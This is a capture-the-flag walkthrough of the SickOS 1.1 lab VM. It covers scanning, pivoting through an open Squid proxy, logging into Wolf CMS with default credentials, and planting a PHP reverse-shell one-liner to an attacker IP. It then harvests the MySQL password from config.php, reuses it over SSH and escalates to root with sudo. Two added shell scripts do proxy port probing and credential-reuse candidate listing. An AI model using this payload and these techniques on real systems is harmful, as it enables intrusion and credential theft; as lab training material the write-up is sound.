SickOS 1.1 VM penetration test (Wolf CMS exploitation, Squid proxy pivot)

2024-08-30 22:20


Target information

VulnHub VM: SickOS 1.1

Host discovery

192.168.50.152 is the target IP (192.168.50.147 is the attacking Kali box).

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 09:56 CST
Nmap scan report for 192.168.50.1
Host is up (0.00029s latency).
MAC Address: 00:50:56:F3:32:0E (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00012s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.152
Host is up (0.000086s latency).
MAC Address: 00:0C:29:45:FB:71 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:FE:9D:85 (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.89 seconds

Port scan of the target

Only two open ports (22 and 3128); 8080 answers as closed and everything else is filtered.

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:02 CST
Nmap scan report for 192.168.50.152
Host is up (0.00026s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:45:FB:71 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 26.35 seconds

TCP service and version scan
OpenSSH 5.9p1 on port 22 and Squid 3.1.19 on port 3128; the Ubuntu package version strings date the box to 12.04 (precise).

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap -sT -sV -O -p22,3128,8080 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:05 CST
Nmap scan report for 192.168.50.152
Host is up (0.00046s latency).
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open   http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
MAC Address: 00:0C:29:45:FB:71 (VMware)
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.10 - 4.11 (92%), Linux 3.13 (91%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%), Linux 3.10 (91%), Linux 3.2 - 3.10 (91%), Linux 3.2 - 3.16 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.96 seconds

A quick UDP check of the same ports (open|filtered only means nothing answered, so nothing to act on here)

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap -sU -p22,3128,8080 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:08 CST
Nmap scan report for 192.168.50.152
Host is up (0.00030s latency).
PORT     STATE         SERVICE
22/udp   open|filtered ssh
3128/udp open|filtered ndl-aas
8080/udp open|filtered http-alt
MAC Address: 00:0C:29:45:FB:71 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 14.37 seconds

Run the vuln NSE script category against the three ports; it reports nothing for any of them

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo nmap --script=vuln -p22,3128,8080 192.168.50.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 10:09 CST
Nmap scan report for 192.168.50.152
Host is up (0.00033s latency).
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:45:FB:71 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 24.37 seconds

Exploitation

Port 3128
[screenshot: http://192.168.50.152:3128/ opened in the browser]

Directory brute force

dirb first, aimed straight at the proxy port

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo dirb http://192.168.50.152:3128/
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Fri Aug 30 10:26:10 2024
URL_BASE: http://192.168.50.152:3128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.50.152:3128/ ----
-----------------
END_TIME: Fri Aug 30 10:26:21 2024
DOWNLOADED: 4612 - FOUND: 0

gobuster, also straight at the proxy port

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo gobuster dir -u http://192.168.50.152:3128/ -w /usr/share/wordlists/dirbuster/directories.jbrofuzz
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.50.152:3128/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directories.jbrofuzz
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.50.152:3128/b81e40f1-1fe8-408c-a188-83cb028e2898 => 400 (Length: 3223). To continue please exclude the status code or the length

Neither tool finds anything because 3128 is not a web server, it is a forward proxy: a request for a bare path gets Squid's own 400 error page back, which is why every guess had the same status and length. The wordlist has to be sent through the proxy to the web server on the target itself (port 80, which the full port scan showed as filtered from the outside).

Scan through the proxy instead

┌──(kali㉿kali)-[~/testSickos]
└─$ sudo dirb http://192.168.50.152/ -p http://192.168.50.152:3128/
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Fri Aug 30 15:35:15 2024
URL_BASE: http://192.168.50.152/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.50.152:3128/
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.50.152/ ----
+ http://192.168.50.152/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.50.152/connect (CODE:200|SIZE:109)
+ http://192.168.50.152/index (CODE:200|SIZE:21)
+ http://192.168.50.152/index.php (CODE:200|SIZE:21)
+ http://192.168.50.152/robots (CODE:200|SIZE:45)
+ http://192.168.50.152/robots.txt (CODE:200|SIZE:45)
+ http://192.168.50.152/server-status (CODE:403|SIZE:295)
-----------------
END_TIME: Fri Aug 30 15:35:17 2024
DOWNLOADED: 4612 - FOUND: 7
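The three runs above make one point: a wordlist aimed directly at 3128 only ever talks to Squid (gobuster's constant-length 400 is Squid's own error page), and the web server on port 80 only answers once requests go through the proxy. The same property, Squid opening the onward connection from the target, lets you ask it about other ports, including services bound to loopback on the target, before you have any foothold. The script below is an added example and not part of the original write-up. It assumes curl is installed and that Squid labels its error pages with an X-Squid-Error header, as 3.x does; the template names (ERR_CONNECT_FAIL, ERR_ACCESS_DENIED, ERR_DNS_FAIL, ERR_INVALID_URL) are Squid's, the one-word classifications are mine.

```shell
#!/bin/sh
# Added example (not from the original write-up): probe ports on the target,
# or on hosts reachable from it, through the open Squid proxy on 3128 and
# classify what the proxy says about the upstream. Assumes curl is installed
# and that Squid sets X-Squid-Error on its error pages (Squid 3.x behaviour).

PROXY="${PROXY:-http://192.168.50.152:3128}"

# Read raw HTTP response headers on stdin and print one word:
#   open        upstream answered (any status, no Squid error page)
#   closed      Squid reached the host but the port refused the connection
#   denied      Squid's ACL (e.g. the default Safe_ports rule) blocked it
#   no-dns      Squid could not resolve the name
#   not-proxied request was not a proxy request, Squid's 400 "Invalid URL"
classify_squid_headers() {
    hdrs=$(tr -d '\r')
    status=$(printf '%s\n' "$hdrs" | sed -n '1s/^HTTP\/[0-9.]* \([0-9]*\).*/\1/p')
    err=$(printf '%s\n' "$hdrs" | grep -i '^X-Squid-Error:' | awk '{print $2}')
    case "$err" in
        ERR_CONNECT_FAIL)  echo "closed" ;;
        ERR_ACCESS_DENIED) echo "denied" ;;
        ERR_DNS_FAIL)      echo "no-dns" ;;
        ERR_INVALID_URL)   echo "not-proxied" ;;
        ERR_*)             echo "proxy-error:$err" ;;
        "")
            case "$status" in
                2*|3*|401|403|404|5*) echo "open" ;;
                *) echo "unknown:$status" ;;
            esac ;;
    esac
}

# Ask the proxy for http://<host>:<port>/ and classify the answer.
# -D - writes the response headers to stdout, the body is discarded.
probe_port() {
    curl -s -m 5 -o /dev/null -D - -x "$PROXY" "http://$1:$2/" | classify_squid_headers
}

# scan_host <host> <port>...
scan_host() {
    h=$1; shift
    for p in "$@"; do
        printf '%s:%s %s\n' "$h" "$p" "$(probe_port "$h" "$p")"
    done
}

# Usage: sh squid-probe.sh 127.0.0.1 80 8080 3306
# 127.0.0.1 here is loopback as seen by the target, because Squid connects.
if [ $# -ge 2 ]; then
    scan_host "$@"
fi
```

Two caveats when reading the output: a stock squid.conf only permits the Safe_ports list, so "denied" on 3306 means the ACL stopped the request, not that MySQL is down; "closed", on the other hand, is a real answer from the target's own network stack, since Squid tried the connection for you.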

Point the browser at the proxy as well

[screenshot: robots.txt, which lists /wolfcms]
[screenshot: /wolfcms, a Wolf CMS site]
[screenshot: search result for the Wolf CMS admin path]

Admin path: /?/admin/login

account: admin
password: admin

Put a PHP one-liner into an article. Wolf CMS lets page bodies contain PHP, which runs when the page is rendered, so the reverse shell below is all that is needed:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/443 0>&1'");?>

Start a listener, then open the article so the PHP executes

Shell obtained
[screenshot: the reverse shell connecting back]

Look around inside

┌──(kali㉿kali)-[~]
└─$ sudo ncat -lvnp 443    
[sudo] password for kali: 
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.50.152:45110.
bash: no job control in this shell
www-data@SickOs:/var/www/wolfcms$ whoami
whoami
www-data
www-data@SickOs:/var/www/wolfcms$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:45:fb:71 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.152/24 brd 192.168.50.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe45:fb71/64 scope link 
       valid_lft forever preferred_lft forever
www-data@SickOs:/var/www/wolfcms$ 

Look at the configuration file config.php

<?php
// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);

// Should Wolf check for updates on Wolf itself and the installed plugins?
define('CHECK_UPDATES', true);

// The number of seconds before the check for a new Wolf version times out in case of problems.
define('CHECK_TIMEOUT', 3);

Something useful: the MySQL credentials root / john@123. The password is worth trying against the system accounts, since people reuse them.

Look at /etc/passwd for accounts that can actually log in

www-data@SickOs:/var/www/wolfcms$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false                                                                                                                                                                  
messagebus:x:102:105::/var/run/dbus:/bin/false                                                                                                                                                             
whoopsie:x:103:106::/nonexistent:/bin/false                                                                                                                                                                
landscape:x:104:109::/var/lib/landscape:/bin/false                                                                                                                                                         
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin                                                                                                                                                          
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash                                                                                                                                                        
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false                                                                                                                                                    
www-data@SickOs:/var/www/wolfcms$     

uname -a for the kernel version

www-data@SickOs:/var/www/wolfcms$ uname -a                                                                                                                                                                 
uname -a                                                                                                                                                                                                   
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux                                                                                             
www-data@SickOs:/var/www/wolfcms$  

Try SSH as sickos with the database password

sudo ssh sickos@192.168.50.152

password: john@123 (accepted: the password is reused)

sickos@SickOs:~$ whoami
sickos
sickos@SickOs:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:45:fb:71 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.152/24 brd 192.168.50.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe45:fb71/64 scope link 
       valid_lft forever preferred_lft forever
sickos@SickOs:~$ 
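The three steps just taken (read config.php, read /etc/passwd, try the database password over SSH) are a credential-reuse check that is worth doing mechanically on every box. The script below is an added example, not code from the original write-up: it pulls the define() values out of a Wolf CMS config.php and lists the accounts from a passwd file that have a real shell and are either root or a regular user. The file paths are the ones seen on SickOS; the uid heuristic is mine, not a Wolf CMS or Ubuntu convention.

```shell
#!/bin/sh
# Added example (not from the original write-up): harvest the database
# password from a Wolf CMS config.php and list the local accounts worth
# trying it against over SSH. Paths match SickOS; the rest is generic.

# Print the value of define('NAME', '...') from PHP source read on stdin.
php_define() {
    sed -n "s/.*define('$1', *'\\([^']*\\)').*/\\1/p"
}

# Print users from a passwd file on stdin that can actually log in:
# root, or a regular account (uid 1000-65533), with a shell that is not
# a deliberate dead end such as /bin/false, nologin or sync.
interactive_users() {
    awk -F: '($3 == 0 || ($3 >= 1000 && $3 < 65534)) &&
             $7 !~ /(false|nologin|sync)$/ && $7 ~ /sh$/ { print $1 }'
}

# Usage: sh cred-reuse.sh /var/www/wolfcms/config.php /etc/passwd
# Prints the candidate list only; the login attempts are left to the operator.
if [ $# -eq 2 ]; then
    user=$(php_define DB_USER < "$1")
    pass=$(php_define DB_PASS < "$1")
    echo "config.php credentials: $user / $pass"
    echo "accounts to try that password against:"
    interactive_users < "$2"
fi
```

On SickOS this yields exactly two names, root and sickos, and the second one accepts john@123. Leaving daemon-style accounts with /bin/sh out by uid rather than by shell matters on older Ubuntu, where most system accounts still carry /bin/sh.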

Check what the account may run with sudo -l

sickos@SickOs:~$ sudo -l
[sudo] password for sickos: 
Matching Defaults entries for sickos on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL
sickos@SickOs:~$ 

sickos can run anything as anyone, so starting a new bash through sudo gives root

sickos@SickOs:~$ sudo /bin/bash
root@SickOs:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:45:fb:71 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.152/24 brd 192.168.50.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe45:fb71/64 scope link 
       valid_lft forever preferred_lft forever
root@SickOs:~# whoami
root
root@SickOs:~# 

Find the flag

root@SickOs:~# ls
root@SickOs:~# pwd
/home/sickos
root@SickOs:~# cd /root
root@SickOs:/root# ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt 
If you are viewing this!!ROOT!You have Succesfully completed SickOS1.1.
Thanks for Trying
root@SickOs:/root# 

Done
[screenshot: root flag]

Summary

TCP scan in the host discovery phase: 22 and 3128 open, 8080 closed, everything else filtered.
3128 is Squid, acting as a forward proxy.
Using 3128 as the proxy reaches the web server on the target's own port 80, which is filtered from the outside.
dirb -p through the proxy brute-forces the directories on port 80.
robots.txt on port 80 points to /wolfcms.
The Wolf CMS admin path is /?/admin/login.
A search for the default credentials gives admin / admin.
Articles can contain PHP, so a reverse-shell one-liner in an article gives a shell.
Initial shell as www-data.
ls shows config.php, which holds the MySQL credentials root / john@123.
/etc/passwd gives the candidate local users.
Trying the password over SSH: user sickos reuses john@123.
With the sickos shell, sudo -l shows (ALL : ALL) ALL.
sudo /bin/bash gives a root shell.
Find the flag; done.




http://www.chinasem.cn/article/1122096
